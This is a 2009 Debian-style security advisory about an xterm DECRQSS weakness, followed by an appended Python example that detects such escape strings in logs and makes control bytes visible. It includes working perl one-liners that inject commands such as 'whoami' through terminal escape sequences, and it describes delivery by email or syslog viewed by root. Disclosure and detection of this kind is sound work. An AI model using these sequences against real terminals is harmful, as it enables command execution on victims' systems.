
# Title : Debian GNU/Linux XTERM (DECRQSS/comments) Weakness Vulnerability
# Published : 2009-01-06
# Author : Paul Szabo


Package: xterm
Version: 222-1etch2
Severity: grave
Tags: security patch
Justification: user security hole


DECRQSS Device Control Request Status String "DCS $ q" simply echoes
(responds with) invalid commands. For example,
perl -e 'print "\eP\$q\nbad-command\n\e\\"'
would run bad-command.

Exploitability is the same as for the "window title reporting" issue
in DSA-380: include the DCS string in an email message to the victim,
or arrange to have it in syslog to be viewed by root.

Original:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030

Test:

perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log
cat bla.log

If whoami gets executed you should update. 
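
Because the string can arrive through e-mail or syslog, it helps to check untrusted text before it reaches the terminal. The following Python is an added example, not part of the original report: it flags 7-bit DECRQSS strings (ESC P $ q ... ESC \) in a byte stream and rewrites control bytes in caret notation so the terminal displays them instead of interpreting them. The function names and the sample log are constructed for illustration, and 8-bit C1 forms of DCS are not handled.

```python
import re

# 7-bit DCS introducer is ESC P; the string terminator (ST) is ESC \.
# An unterminated DCS running to end of input is reported as well.
DCS_RE = re.compile(rb"\x1bP(.*?)(?:\x1b\\|\Z)", re.DOTALL)

def find_decrqss(data: bytes):
    """Return (line_number, payload) for each DECRQSS string in data."""
    hits = []
    for m in DCS_RE.finditer(data):
        payload = m.group(1)
        if payload.startswith(b"$q"):  # DECRQSS is DCS followed by "$q"
            line_no = data.count(b"\n", 0, m.start()) + 1
            hits.append((line_no, payload[2:]))
    return hits

def make_visible(data: bytes) -> bytes:
    """Rewrite C0 control bytes (except tab and newline) and DEL in caret
    notation. Bytes >= 0x80 pass through unchanged (assumes 7-bit or UTF-8)."""
    out = bytearray()
    for b in data:
        if b < 0x20 and b not in (0x09, 0x0A):
            out += b"^" + bytes([b + 0x40])  # ESC (0x1b) becomes "^["
        elif b == 0x7F:
            out += b"^?"
        else:
            out.append(b)
    return bytes(out)

# Constructed sample log: one benign line, one carrying a DECRQSS string.
SAMPLE = (
    b"Jan  6 10:00:01 host sshd[101]: session opened for user alice\n"
    b"Jan  6 10:00:02 host app[202]: bad input \x1bP$q\nplaceholder\n\x1b\\\n"
)

if __name__ == "__main__":
    for line_no, payload in find_decrqss(SAMPLE):
        print(f"line {line_no}: DECRQSS payload {payload!r}")
    print(make_visible(SAMPLE).decode("ascii"))
```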
